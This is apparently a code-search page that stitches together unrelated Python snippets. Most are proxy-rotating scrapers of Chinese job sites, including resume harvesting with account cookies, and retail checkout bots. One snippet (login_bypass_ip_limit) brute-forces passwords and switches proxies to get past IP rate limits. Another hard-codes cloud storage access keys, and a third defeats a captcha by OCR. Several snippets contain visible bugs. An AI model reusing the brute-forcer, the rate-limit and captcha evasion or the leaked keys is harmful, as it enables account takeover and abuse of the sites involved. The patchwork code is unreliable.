Exemplo n.º 1
0
def next_html(account_cookies, data, retry):
    logger.info('开始进行下一页 %s %s' % (
        account_cookies.get('userName', ''),
        retry,
    ))
    global proxy
    if retry <= 0:
        return None
    cookie = account_cookies.get('cookie')
    headers = arouse_utils.get_get_headers()
    url = 'http://ehire.51job.com/Candidate/SearchResumeNew.aspx'
    logger.info(proxy)

    result = utils.download(url=url,
                            data=data,
                            proxy=proxy,
                            cookie=cookie,
                            headers=headers,
                            method='post')

    if result['code'] != 0:
        logger.error("连接页面异常 ,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return next_html(cookie, data, retry - 1)
    elif '用户数不够' in result['data'] or len(result['data']) < 1000:
        logger.error("代理异常,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return next_html(cookie, data, retry - 1)
    if '您的操作过于频繁,请注意劳逸结合' in result['data']:
        return None
    return result['data']
Exemplo n.º 2
0
def go_to_search_html(cookie, retry):
    global proxy
    if retry <= 0:
        return None
    logger.info('跳转搜索前置页面中------%s ' % retry)
    url = 'http://ehire.51job.com/Candidate/SearchResumeIndexNew.aspx'
    headers = arouse_utils.get_get_headers(
        'http://ehire.51job.com/Navigate.aspx')
    if not proxy:
        proxy = utils.get_proxy()
    logger.info(proxy)
    utils_download = utils.download(url=url,
                                    headers=headers,
                                    proxy=proxy,
                                    cookie=cookie)

    if utils_download['code'] != 0:
        logger.error('搜索页面出错:%s %s' % (url, retry))
        if utils_download.get(
                'data'
        ) and '<a href="/MainLogin.aspx?returl=' in utils_download['data']:
            return 'login'
        proxy = utils.get_proxy()
        return go_to_search_html(cookie, retry - 1)

    if '<a href="/MainLogin.aspx?returl=' in utils_download['data']:
        return 'login'
    viewstate = arouse_utils.find(
        '<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*?)" />',
        utils_download['data'])
    if not viewstate:
        proxy = utils.get_proxy()
        go_to_search_html(cookie, retry - 1)
    return viewstate
Exemplo n.º 3
0
def go_to_list_html(param, cookie, viewstate, retry):
    global proxy
    logger.info('搜索前置页面-开始初始搜索------ %s' % retry)
    if retry <= 0:
        return None
    url = 'http://ehire.51job.com/Candidate/SearchResumeNew.aspx'
    # param = {"function_code": "0107", "functionName": "软件工程师", "region_code": "010000",
    #          "regionName": "北京"}
    data = arouse_utils.get_frist_post_headers(viewstate, param=param)

    logger.info(proxy)
    result = utils.download(url=url,
                            data=data,
                            proxy=proxy,
                            cookie=cookie,
                            method='post')
    if result['code'] != 0:
        logger.error("连接页面异常 ,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return go_to_list_html(param, cookie, viewstate, retry - 1)
    elif '用户数不够' in result['data'] or len(result['data']) < 1000:
        logger.error("代理异常,重试: retry= %s" % retry)
        proxy = utils.get_proxy()
        return go_to_list_html(cookie, viewstate, retry - 1)
    if '您的操作过于频繁,请注意劳逸结合' in result['data']:
        return None
    return result['data']
Exemplo n.º 4
0
def refer_list_html(account, data, retry):
    """
    刷新下一页
    :param resume_ids:
    :param retry:
    :return: 刷新后的列表页面
    """
    global proxy
    if retry <= 0:
        return None
    headers = inbox_utils.get_headers(
        'http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1')
    headers['Cookie'] = account['cookies']
    proxy = common_utils.get_proxy()
    url = 'http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1'
    r = common_utils.download(url=url,
                              headers=headers,
                              data=data,
                              method='post',
                              cookie=account['cookie'],
                              proxy=proxy)

    if r.get('code') != 0:
        logger.error("列表页面返回不正常 %s" % r.get('data'))
        if r.get('data') and '<a href="/MainLogin.aspx?returl=' in r['data']:
            return 'login'
        proxy = common_utils.get_proxy()
        return refer_list_html(account, data, retry - 1)

    if '<a href="/MainLogin.aspx?returl=' in r['data']:
        return 'login'

    return r.get('data')
Exemplo n.º 5
0
 def run(self):
     profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
     if profile == None:
         self.status_signal.emit({
             "msg": "Invalid profile",
             "status": "error"
         })
         return
     if proxy == None:
         self.status_signal.emit({
             "msg": "Invalid proxy list",
             "status": "error"
         })
         return
     if self.site == "Walmart":
         Walmart(self.task_id, self.status_signal, self.image_signal,
                 self.product, profile, proxy, self.monitor_delay,
                 self.error_delay, self.max_price)
     elif self.site == "Bestbuy":
         BestBuy(self.task_id, self.status_signal, self.image_signal,
                 self.product, profile, proxy, self.monitor_delay,
                 self.error_delay)
     elif self.site == "Target":
         Target(self.task_id, self.status_signal, self.image_signal,
                self.product, profile, proxy, self.monitor_delay,
                self.error_delay)
Exemplo n.º 6
0
def conn_html(account, url, retry, refer_url=None, track_id=None):
    """
    连接搜索列表
    :return:
    """
    global proxy
    logger.info("开始连接 %s , 重试次数 %s" % (url, retry))
    if retry <= 0:
        return None
    headers = inbox_utils.get_headers(refer_url)
    # headers['Cookie'] = account['cookie']
    # r = requests.get(url, headers=headers, timeout=10)
    r = common_utils.download(url=url,
                              headers=headers,
                              cookie=account['cookie'],
                              proxy=proxy)

    if r.get("code") != 0:
        logger.error("列表页面返回不正常 data= %s" % r.get('data'))
        if r.get('data') and '<a href="/MainLogin.aspx?returl=' in r['data']:
            return 'login'
        proxy = common_utils.get_proxy()
        return conn_html(account, url, retry - 1, refer_url, track_id)
    if '<a href="/MainLogin.aspx?returl=' in r['data']:
        return 'login'

    return r.get('data')
Exemplo n.º 7
0
 def run(self):
     profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
     if profile is None:
         self.status_signal.emit({
             "msg": "Invalid profile",
             "status": "error"
         })
         return
     if proxy is None:
         self.status_signal.emit({
             "msg": "Invalid proxy list",
             "status": "error"
         })
         return
     if self.site == "Walmart":
         Walmart(self.task_id, self.status_signal, self.image_signal,
                 self.wait_poll_signal, self.wait_condition, self.product,
                 profile, proxy, self.monitor_delay, self.error_delay,
                 self.max_price)
     elif self.site == "Bestbuy":
         BestBuy(self.status_signal, self.image_signal, self.product,
                 profile, proxy, self.monitor_delay,
                 self.error_delay)  #TODO: Readd Discord Webhook
     elif self.site == "Target":
         Target(self.task_id, self.status_signal, self.image_signal,
                self.product, profile, proxy, self.monitor_delay,
                self.error_delay)
     elif self.site == "GameStop":
         GameStop(self.task_id, self.status_signal, self.image_signal,
                  self.product, profile, proxy, self.monitor_delay,
                  self.error_delay, self.max_price)
Exemplo n.º 8
0
def save_mobile_imgs_to_oss(img_url, retry, trackId, headers=None):
    """
    连接获取电话图片保存oss
    :return:
    """
    logger = common_utils.get_logger()
    logger.error("准备连接电话图片: %s" % trackId)
    if retry <= 0:
        return None
    try:
        r = requests.get(img_url, proxies=common_utils.get_proxy(), timeout=8)
    except Exception as e:
        logger.error(e)
        logger.error("连接电话图片异常: %s 重试" % trackId)
        return save_mobile_imgs_to_oss(img_url, retry - 1, trackId)

    # 存储oss
    logger.error("准备存储oss: %s " % trackId)
    auth = oss2.Auth('LTAIa3y58SBV0Kyn', 'yBZcBKhQTgtf4cV55ljpnNCSk1XWaI')
    bucket = oss2.Bucket(auth, 'http://oss-cn-beijing.aliyuncs.com', 'ocr-img')
    # oss_api = OssAPI('http://oss-cn-beijing.aliyuncs.com', 'LTAIa3y58SBV0Kyn', 'yBZcBKhQTgtf4cV55ljpnNCSk1XWaI')
    oss_addr = 'spider/FIVE_ONE/RESUME_INBOX/' + str(uuid.uuid1()) + '.jpg'
    try:
        # oss_api.put_object('ocr-img', r, oss_addr)
        bucket.put_object(oss_addr, r)
    except Exception as e:
        logger.error(traceback.format_exc())
        return save_mobile_imgs_to_oss(img_url, retry - 1, trackId)

    return oss_addr
Exemplo n.º 9
0
def get_page(url):
    utils.get_logger().info('get_page url %s' % url)
    for x in xrange(3):
        try:
            proxy = utils.get_proxy()
            utils.get_logger().error('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url, headers={
                'Connection': 'keep-alive',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0(Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
                'Accept': 'text/html, application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
                'Accept-Encoding': 'gzip, deflate, sdch',
                'Accept-Language': 'zh-CN,zh;q=0.8',
            }, proxies=proxy, timeout=10).content
            if content:
                utils.get_logger().info('[the page use proxy %s] ' % proxy)
                if '验证码' in content:
                    utils.get_logger().info('[the page needs input validate code %s]' % url)
                else:
                    return {'content': content, 'proxy': proxy}
            else:
                utils.get_logger().info('[request returns null page %s]' % url)
        except Exception as e:
            utils.get_logger().error(str(traceback.format_exc()))

    return None
Exemplo n.º 10
0
def start_one_job(account):
    """开启一个帐号的任务
    :account dict : 帐号,含有cookie
    """
    global proxy
    track_id = str(uuid.uuid1())
    url = "http://ehire.51job.com/Inbox/InboxRecentEngine.aspx?Style=1"
    refer_url = "http://ehire.51job.com/Navigate.aspx?ShowTips=11&PwdComplexity=N"
    proxy = common_utils.get_proxy()
    list_html = conn_html(account,
                          url,
                          5,
                          refer_url=refer_url,
                          track_id=track_id)
    # list_html = open('text_htl').read()  # 测试
    while True:
        if list_html:
            if 'login' == list_html:
                # 需要登录
                logger.error("出现登录页面 %s" % account['userName'])
                return 'login'
            else:
                hidEngineCvlogIds = common_utils.find(
                    '<input name="hidEngineCvlogIds" type="hidden" id="hidEngineCvlogIds" value="(.*?)" />',
                    list_html)
                __VIEWSTATE = common_utils.find(
                    '<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*?)" />',
                    list_html)
                resume_ids = parse_list_html(list_html, track_id=track_id)
                if 'none' == resume_ids:
                    logger.info("邮箱没有邮件了--%s" % account['userName'])
                    return 'over'
                elif 'refer-login' == resume_ids:
                    logger.error("出现登录页面 %s" % account['userName'])
                    return 'login'

                if resume_ids:
                    ids_for = list(resume_ids)
                    logger.info('简历个数: %s' % len(resume_ids))
                    for id in ids_for:
                        info_url = 'http://ehire.51job.com/Candidate/ResumeViewFolder.aspx?hidSeqID=%s&hidFolder=EMP' % id
                        flag = info_main(account, info_url, track_id)
                        # flag = True
                        if 'login' == flag:
                            logger.error("出现登录页面 %s" % account['userName'])
                            return 'login'
                        if not flag:  # 失败?
                            resume_ids.remove(id)

                    # 测试
                    # resume_ids = ['9229836941', ]
                    data = get_refer_data(resume_ids, __VIEWSTATE,
                                          hidEngineCvlogIds)
                    # list_html = refer_list_html(account, data, 4)
                else:  # 解析失败
                    logger.error("页面 未能解析出简历%s" % account['userName'])
                    return 'error'
        else:  # 解析失败
            logger.error("出现错误页面 %s" % account['userName'])
            return 'error'
Exemplo n.º 11
0
def get_page(url, header):
    logger.info('get_page url %s' % url)
    for x in xrange(3):
        try:
            proxy = utils.get_proxy()
            logger.info('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url,
                                  headers=header,
                                  proxies=proxy,
                                  timeout=10).content
            if content:
                logger.info('[the page use proxy %s] ' % proxy)
                if '验证码' in content or '机器人' in content:
                    logger.info('[the page needs input validate code %s]' %
                                url)
                    return None
                else:
                    return {'content': content, 'proxy': proxy}
            else:
                logger.info('[request returns null page %s]' % url)
        except Exception as e:
            logger.error(str(traceback.format_exc()))

    return None
Exemplo n.º 12
0
def get_list(city=None, zone=None, money=None, education=None, experience=None, size=None, page_now=None, is_get_zone=None, proxy=None, jobtitle=None, **kwargs):
    logger = utils.get_logger()
    
    proxy = proxy if proxy else utils.get_proxy()
    # proxy = utils.get_proxy()
    
    # logger.info('split_list_thread start!!!')
    result = {'code': 0}
    # list_url = 'http://www.zhipin.com/%s/e_105-d_203-s_302-y_4-b_%E6%9C%9D%E9%98%B3%E5%8C%BA/?page=%s&ka=page-next'
    city_param = 'c' + str(city)
    zone_param =  'b_' + str(zone) if zone else ''
    # industry_param = 'i'+str(industry)+'-' if industry else ''
    jobtitle_param = '-p'+str(jobtitle) if jobtitle else ''
    money_param = 'y_'+str(money)+'-' if money else ''
    education_param = 'd_'+str(education)+'-' if education else ''
    experience_param = 'e_'+str(experience)+'-' if experience else ''
    size_param = 's_'+str(size)+'-' if size else ''
    # list_url = 'http://www.zhipin.com/%s/?page=%s' % (city, page_now)
    if experience_param or education_param or size_param or money_param or zone_param:
        list_url = 'http://www.zhipin.com/'+city_param+jobtitle_param+'/'+experience_param+education_param+size_param+money_param+zone_param+'/?page='+str(page_now)+'&ka=page-next'
    else:
        list_url = 'http://www.zhipin.com/'+city_param+jobtitle_param+'/?page='+str(page_now)+'&ka=page-next'
    logger.info('the url, proxy is'+list_url+'    '+str(proxy))
    # time.sleep(2)
    list_header = {
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding':'gzip, deflate, sdch',
        'Accept-Language':'zh-CN,zh;q=0.8',
        'Host':'www.zhipin.com',
        'Upgrade-Insecure-Requests':'1',
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
    }
    while True:
        logger.info('download url:'+list_url)
        try:
            response = requests.get(list_url, headers=list_header, allow_redirects=False, proxies=proxy, timeout=10)
            if response.status_code in [200, '200']:
                if len(response.text) < 1024:
                    logger.info('get '+response.text)
                else:
                    break
            else:
                logger.info('not get 200 when download list!!!'+ str(response.status_code))
                # result['code']=1
        except Exception, e:
            logger.info(str(traceback.format_exc()))
        proxy.update(utils.get_proxy())
Exemplo n.º 13
0
def login_bypass_ip_limit():
    """
    针对限制了ip访问次数的登录进行爆破
    :return:
    """
    # 开始登录
    global CUR_PROXY
    try:
        login_info = dict_queue.get(block=False)
    except:
        return

    username = login_info[0]
    # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
    if username in success_username:
        return

    password = login_info[1]

    payload = {
        "username": username,
        "password": password,
    }
    print('开始尝试用户名:{},密码:{}'.format(username, password))

    S = requests.Session()
    while True:
        try:
            response = S.post(settings.LOGIN_LIMIT_IP_URL,
                              data=payload,
                              proxies=CUR_PROXY,
                              timeout=5)
            if response.status_code == 200:
                # 正常获取到了服务器请求
                soup = BeautifulSoup(response.text, 'lxml')
                if soup.find('span', text='对不起,您的访问过于频繁,请等待60秒后再操作!'):
                    # 捕获到了限制信息,改用代理登录
                    print("被限制了")
                    CUR_PROXY = utils.get_proxy()
                    print("当前使用代理:{}".format(CUR_PROXY))
                    continue

                elif soup.find('a', attrs={'id': 'backdoor'}):
                    # 用户名密码正确,成功登录
                    success_queue.put(payload)
                    success_username.append(username)
                    print('【爆破成功,用户名:{},密码:{}】'.format(username, password))
                    # stop_brute()
                    return True

                elif soup.find('span', text='用户名或密码错误!'):
                    # print("用户名或密码错误")
                    return False
                else:
                    pass
            else:
                print("连接异常")
        except Exception as e:
            print(e)
    def __init__(self):
        self.twitterTokens = get_tokens()

        http_proxy, https_proxy = get_proxy()

        self.api = twitter.Api(consumer_key=self.twitterTokens['consumer_key'],
                          consumer_secret=self.twitterTokens['consumer_secret'],
                          access_token_key=self.twitterTokens['access_token'],
                          access_token_secret=self.twitterTokens['access_token_secret'],
                               proxies={'http':http_proxy, 'https':https_proxy})
Exemplo n.º 15
0
def get_detail_html(url):
    for i in range(5):
        try:
            response = requests.get(url, headers=headers, proxies=get_proxy())
            if response.status_code == 200:
                response.encoding = "gbk"
                print("当前运行url为-{}".format(url))
                return response.text
        except:
            pass
Exemplo n.º 16
0
def get_page(url, header, proxy=None):
    logger.info('get_page url %s' % url)
    for x in xrange(4):
        try:
            if not proxy:
                proxy = utils.get_proxy()
            logger.info('get_page[use proxy %s]' % proxy)
            session = requests.session()
            content = session.get(url=url,
                                  headers=header,
                                  proxies=proxy,
                                  timeout=5).content
            if content:
                logger.info('[the page use proxy %s] ' % proxy)
                return {'content': content, 'proxy': proxy}
            else:
                logger.info('[request returns null page %s]' % url)

        except Exception as e:
            logger.error(str(traceback.format_exc()))
            proxy = utils.get_proxy()
    return None
Exemplo n.º 17
0
def process(task):
    """
        根据一个搜索条件开始一项搜索
        :return:
        """
    global logger
    if project_settings.get('useAby'):
        getproxies_ = project_settings.get('aby')
    else:
        getproxies_ = utils.get_proxy()
    logger = utils.get_logger()
    param_dict = json.loads(task['data'][0]['executeParam'], encoding="utf-8")

    result = {'code': 0}
    track_id = str(uuid.uuid1())

    page_num = 1
    if param_dict['page_num']:
        page_num = param_dict['page_num']
    while True:
        url = get_list_url(param_dict, page_num)

        list_html_list = get_html(url, 5, track_id, getproxies_)
        if list_html_list:
            logger.info("list_html success when download: " + url)
            info_list = parse_list_html(list_html_list[0], track_id, page_num)
        else:
            # 页面不正常
            logger.error(u"列表页面获取失败: url=%s" % url)
            param_dict['page_num'] = page_num
            result['executeResult'] = 'list_html_error'
            result['executeParam'] = json.dumps(param_dict,
                                                ensure_ascii=False).encode()
            result['code'] = 1
            return result

        if 'none_jd' == info_list:
            # 抓取完了
            logger.info("此搜索条件无新职位可用: url=%s" % url)
            logger.info('没有符合条件的职位 %s' % json.dumps(param_dict))
            result['executeResult'] = u'正常完毕'
            return result
        else:
            for info in info_list:
                try:
                    info_mian(param_dict, info, track_id, getproxies_)
                except Exception, e:
                    logger.error(traceback.extract_stack())

        page_num += 1
Exemplo n.º 18
0
def get_detail_html(url):
    # url = "http://www.chinacar.com.cn/serv/list_0_0_0_0_{}.html".format(page)
    for i in range(5):
        try:
            response = requests.get(url,
                                    headers=headers,
                                    stream=True,
                                    proxies=get_proxy(),
                                    timeout=10)
            if response.status_code == 200:
                print("当前运行url为-{}".format(url))
                # print("ip=======", response.raw._connection.sock.getpeername())
                return response.text
        except:
            pass
Exemplo n.º 19
0
def start():
    if conf.psyco:
        try:
            import psyco
            psyco.full()
            logger.critical("Enabling psyco support.")
        except:
            logger.critical(
                "Looks like psyco is not installed in your system. Psyco acceleration will not be enabled."
            )
            pass
    if conf.http_proxy:
        try:
            conf.http_proxy = utils.get_proxy(conf.http_proxy)
        except:
            logger.critical(
                "Invalid format of HTTP-proxy. No proxy will be used.")
            conf.http_proxy = None
    logger.critical("Starting the caching resolver in a separate thread.")
    resolver.start(['mrim.mail.ru', 'avt.foto.mail.ru'])
    while 1:
        try:
            xmpp_con = transport.XMPPTransport(conf.name, conf.disconame,
                                               conf.server, conf.port,
                                               conf.passwd, logger)
            logger.critical("Connecting to XMPP server")
            xmpp_con.run()
        except KeyboardInterrupt:
            logger.critical('Got SIGINT, closing connections')
            xmpp_con.stop()
            try:
                os.unlink(conf.pidfile)
            except OSError:
                pass
            logger.critical('Shutdown')
            break
        except:
            traceback.print_exc()
            logger.critical("Connection to server lost")
            logger.critical("Trying to reconnect over 5 seconds")
            try:
                xmpp_con.stop(notify=False)
                del xmpp_con
            except:
                traceback.print_exc()
                pass
            time.sleep(5)
Exemplo n.º 20
0
    def run(self):
        profile, proxy = get_profile(self.profile), get_proxy(self.proxies)
        if profile is None:
            self.status_signal.emit({
                "msg": "Invalid profile",
                "status": "error"
            })
            return
        if proxy is None:
            self.status_signal.emit({
                "msg": "Invalid proxy list",
                "status": "error"
            })
            return

        if self.site == "Bestbuy":
            BestBuy(self.status_signal, self.image_signal, self.product,
                    profile, proxy, self.monitor_delay, self.error_delay)
def get_topology_by_rg(helper, access_token, subscription_id, api_version,
                       resourceGroupName, networkWatcherName,
                       targetResourceGroupName):
    url = "https://management.azure.com/subscriptions/%s/resourceGroups/%s/providers/Microsoft.Network/networkWatchers/%s/topology?api-version=%s" % (
        subscription_id, resourceGroupName, networkWatcherName, api_version)
    header = {'Authorization': 'Bearer ' + access_token}
    proxies = utils.get_proxy(helper, "requests")

    try:
        r = requests.post(
            url,
            headers=header,
            proxies=proxies,
            json={'targetResourceGroupName': targetResourceGroupName})
        r.raise_for_status()
        topology = json.loads(r.text)
    except Exception, e:
        raise e
Exemplo n.º 22
0
Arquivo: init.py Projeto: zinid/mrim
def start():
    if conf.psyco:
        try:
            import psyco

            psyco.full()
            logger.critical("Enabling psyco support.")
        except:
            logger.critical("Looks like psyco is not installed in your system. Psyco acceleration will not be enabled.")
            pass
    if conf.http_proxy:
        try:
            conf.http_proxy = utils.get_proxy(conf.http_proxy)
        except:
            logger.critical("Invalid format of HTTP-proxy. No proxy will be used.")
            conf.http_proxy = None
    logger.critical("Starting the caching resolver in a separate thread.")
    resolver.start(["mrim.mail.ru", "avt.foto.mail.ru"])
    while 1:
        try:
            xmpp_con = transport.XMPPTransport(conf.name, conf.disconame, conf.server, conf.port, conf.passwd, logger)
            logger.critical("Connecting to XMPP server")
            xmpp_con.run()
        except KeyboardInterrupt:
            logger.critical("Got SIGINT, closing connections")
            xmpp_con.stop()
            try:
                os.unlink(conf.pidfile)
            except OSError:
                pass
            logger.critical("Shutdown")
            break
        except:
            traceback.print_exc()
            logger.critical("Connection to server lost")
            logger.critical("Trying to reconnect over 5 seconds")
            try:
                xmpp_con.stop(notify=False)
                del xmpp_con
            except:
                traceback.print_exc()
                pass
            time.sleep(5)
Exemplo n.º 23
0
    def get_verifycode(self, client=object, imageUrl=''):

        # 填写自己的 baidu-ocr api信息
        APP_ID = 'xxxxxxxxxx'
        API_KEY = 'xxxxxxxxxxxx'
        SECRET_KEY = 'xxxxxxxxxxxxxxx'

        options = {}
        options["recognize_granularity"] = "big"
        options["detect_direction"] = "true"

        client = AipOcr(APP_ID, API_KEY, SECRET_KEY)
        retry_times = 3
        i = 0
        while i < retry_times:
            i += 1
            try:
                # image = get_file_content(tmpImageName)
                image = self.sess.get(imageUrl, proxies=utils.get_proxy(),
                                      headers=self.a_task.M_HEADERS,
                                      cookies=self.a_task.M_COOKIES,
                                      verify=False)
                # open('vc____.jpg', 'wb').write(image.content)
                response = client.numbers(image.content, options)
                debug_p('[get_verifycode] vc_code response=', response)
                # dict: {'log_id': 3705378724129786481, 'direction': 0, 'words_result_num': 1, 'words_result': [{'location': {'width': 78, 'top': 1, 'left': 13, 'height': 37}, 'words': '4217'}]}
                words_result = response['words_result']
                verifycode = words_result[0].get('words', '')
                if not verifycode or len(verifycode) < 4:
                    continue
                if len(verifycode) > 4:
                    verifycode = verifycode[:4]
                debug_p('[get_verifycode] verifycode=', verifycode, 'i=', i)
                return verifycode
            except Exception as e:
                # speed up
                i += 1
                debug_p('[get_verifycode] Exception', 'i=', i, 'traceback=', traceback.format_exc())
                pass
        return '0000'
Exemplo n.º 24
0
def download_page(url=None, method=None, header=None, refer=None, proxy=None):
    logger = utils.get_logger()
    result = {}
    # if not header:
    header = {
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent':
        'Mozilla/5.0(Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Accept':
        'text/html, application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8',
        'Cookie': 'ZP_OLD_FLAG=true;'
    }
    if refer:
        header['Referer'] = refer
    for x in xrange(0, 3):
        # proxy = utils.get_proxy()
        if project_settings.get('useAby'):
            proxy = project_settings.get('aby')
        else:
            proxy = utils.get_proxy()
        logger.info('download_page : %s ' % url)

        result = utils.download(url=url,
                                headers=header,
                                method=method,
                                allow_redirects=True,
                                retry_time=1,
                                proxy=proxy)
        print result
        if result['code'] == 0:
            logger.info('success when download %s-%s ' % (proxy, url))
            break
        time.sleep(1)

    result['proxy'] = ''
    return result
Exemplo n.º 25
0
def _transfer_test():
    PROXY_INDEX = 0

    # Session Transfer Testing
    proxy, proxy_auth = get_proxy(PROXY_INDEX)
    service_args = [
        '--proxy={}'.format(proxy), '--proxy-type=html',
        '--ignore-ssl-errors=true'
    ]
    if proxy_auth:
        service_args.append('--proxy-auth={}'.format(proxy_auth))

    driver = webdriver.PhantomJS(executable_path=PHANTOM_JS_LOCATION,
                                 service_args=service_args)
    add_to_cart(driver, cc='US')

    # Test transferring session (go to ipecho.net to see ip, got to cart to see if in cart)
    transfer_session(driver,
                     proxy,
                     proxy_auth,
                     user_agent=get_user_agent(PROXY_INDEX))

    time.sleep(60 * 60)
Exemplo n.º 26
0
def parse_list(data):
    logger = utils.get_logger()
    # url = data['url']
    city_url = data['cityUrl']
    page_num = data['pageNum']
    flg = True
    while flg:
        url = build_page_url(data=data, page_num=page_num)
        logger.info('请求列表页 url : %s' % (url, ))
        if project_settings.get('useAby'):
            proxy = project_settings.get('aby')
        else:
            proxy = utils.get_proxy()
        results = download_page(url=url, method='get', proxy=proxy)
        proxy = results['proxy']
        content = results['data']
        if '暂时无符合您条件的职位' in content or '没有符合您要求的职位' in content:
            logger.info('没有符合条件的职位 %s' % json.dumps(data, ensure_ascii=False))
            data['code'] = 200
            flg = True
            break
        if '您要访问的页面暂时没有找到' in content:
            logger.info('页面没有找到,返回404 %s ' % url)
            data['code'] = 200
            flg = True
            break
        if 'jobs.zhaopin.com' in city_url:
            flg = parse_list_v1(page=content,
                                page_num=page_num,
                                data=data,
                                refer=url,
                                proxy=proxy)
        else:
            flg = parse_list_v2(page=content,
                                page_num=page_num,
                                data=data,
                                refer=url,
                                proxy=proxy)

        # 有解析到正常数据
        logger.info('解析列表页详情数据 返回结果 %s' %
                    (json.dumps(flg, ensure_ascii=False)))
        if flg.has_key('status') and flg.get('status'):
            data['code'] = 200
            if flg.has_key('detail_count') and flg.get('detail_count') > 0:
                page_num += 1
            else:
                data['code'] = 200
                flg = False
                break
        else:
            logger.info('列表页面访问失败 %s ' % url)
            data['code'] = 500
            flg = False
            break
        # 对于职位很不错的列表页 直接跳出
        if '以下职位也很不错' in content:
            flg = False
            logger.info('含有 以下职位也很不错 跳出循环')
            data['code'] = 200
            break
    data['pageNum'] = page_num
    return data
Exemplo n.º 27
0
    def reserve_a_seat(self, m_libid, m_clssrm, m_seat_num, m_coordinate, all_lib_clssrm, get_hexcodejs_from_url, verify_key, reserve_url_prefix, lib_seat_info):
        # func_name = 'reserve_a_seat' + str('threadid='+str(self.threadID) + ' thread_name='+str(self.thread_name)+' counter='+str(self.counter))
        func_name = '[r_s] thread='+str(self.thread_name)+'|  '
        debug_p(func_name, 'lib_seat_info=', lib_seat_info, 'libid', m_libid,  'coordinate', m_coordinate)

        requests_time_limit = 3
        self.tmp_trace_dct = {}

        # # exec_time
        exec_ts = time.time() + 0.1  # '1564905302.6147149'
        millisecond = str(str(exec_ts).split('.')[-1])[:3]
        t = str(time.strftime("%Y.%m.%d_%H:%M:%S", time.localtime(exec_ts))) + '.' + millisecond
        self.tmp_trace_dct['exe_time'] = t

        # add lib_seat_info
        # self.task_result += lib_seat_info + '\n'
        # self.task_result += '执行:' + self.exe_time + '\n'

        # type = list  [(lib, clssrm), ()...]
        candidate_libid_clssrm = [{}]
        if int(m_libid) > 0:
            candidate_libid_clssrm = [(m_libid, m_clssrm)]
        elif int(m_libid) < 0:
            # all_lib_clssrm  dict{libid: clssrm}
            all_lib_clssrm.pop(m_libid[1:], 'default_value')
            candidate_libid_clssrm = random.sample(all_lib_clssrm.items(), min(self.request_num_limit, len(all_lib_clssrm)))
        else:
            candidate_libid_clssrm = random.sample(all_lib_clssrm.items(), min(self.request_num_limit, len(all_lib_clssrm)))

        debug_p(func_name, '||candidate libid=', candidate_libid_clssrm)

        # candidate_libid_clssrm = [(lib, clssrm), ()...]
        for (libid, clssrm) in candidate_libid_clssrm:

            self.tmp_trace_dct['libid'] = libid
            self.tmp_trace_dct['clssrm'] = clssrm

            if requests_time_limit <= 0:
                break

            ### test
            time.sleep(3)

            # debug_p(func_name, 'get_hexcodejs_from_url=', get_hexcodejs_from_url)
            # entry pre_seatmap_page

            # print('123', self.a_task.M_COOKIES)

            #
            if self.a_task.pattern == "PRE":
                get_hexcodejs_from_url = get_hexcodejs_from_url.format(libid=libid)
            else:
                # TODAY
                get_hexcodejs_from_url = get_hexcodejs_from_url.format(libid=libid, now_time=int(time.time()))

            html_seatmap = utils.get_response(
                url=get_hexcodejs_from_url, sess=self.sess,
                m_headers=self.a_task.M_HEADERS, m_cookies=self.a_task.M_COOKIES,
                verify_key=verify_key, platform=self.a_task.platform)
            # judge html_doc
            if not html_seatmap:
                # sessid invalid--> task completed
                self.tmp_trace_dct['code'] = 404
                self.tmp_trace_dct['msg'] = '尝试进入座位表失败!可能:{不在预约时间, 服务器无响应, id失效}'

                # task failed,  sessionid invalid
                debug_p(func_name, '[E]: pre_seatmap_page is none, get_hexcodejs_from_url='+get_hexcodejs_from_url)
                # info = '结果:{succ_failed}-【{msg}】\n'
                # info = info.format(succ_failed='FAILED',
                #                    msg='未知原因-进入座位表页面失败,请反馈管理员处理...')
                # self.task_result += info
                # sessionid invalid, task completed
                return True #, 'pre_seatmap_page is none, get_hexcodejs_from_url='+get_hexcodejs_from_url

            # get get_empty_seat
            # type = list [(seat_num, coordinate), (), ...]
            candidate_seat_crdnt = []
            if int(libid) > 0 and int(m_seat_num) > 0:
                candidate_seat_crdnt = [(m_seat_num, m_coordinate)]
            elif int(libid) <= 0:
                # assert seat_num==0
                candidate_seat_crdnt = self.get_empty_seat(html_seatmap=html_seatmap, number=1)
            elif int(m_seat_num) <= 0:
                # m_lib > 0 and m_seat_num <= 0 , get three candidate without m_seat_num
                candidate_seat_crdnt = self.get_empty_seat(html_seatmap=html_seatmap, number=self.request_num_limit,
                                                           discard_seatnum=m_seat_num)
            else:
                pass
            if len(candidate_seat_crdnt) == 0:
                # no candidate seat crdnt
                continue
            debug_p(func_name, '||candidate seat=', candidate_seat_crdnt)
            #
            soup = BeautifulSoup(html_seatmap, 'html.parser')

            ### test
            open('lxz_seatmap.html', 'w').write(html_seatmap)

            # debug_p(func_name, '\n\nhtml_doc=', html_seatmap)
            # get hexch_js_code
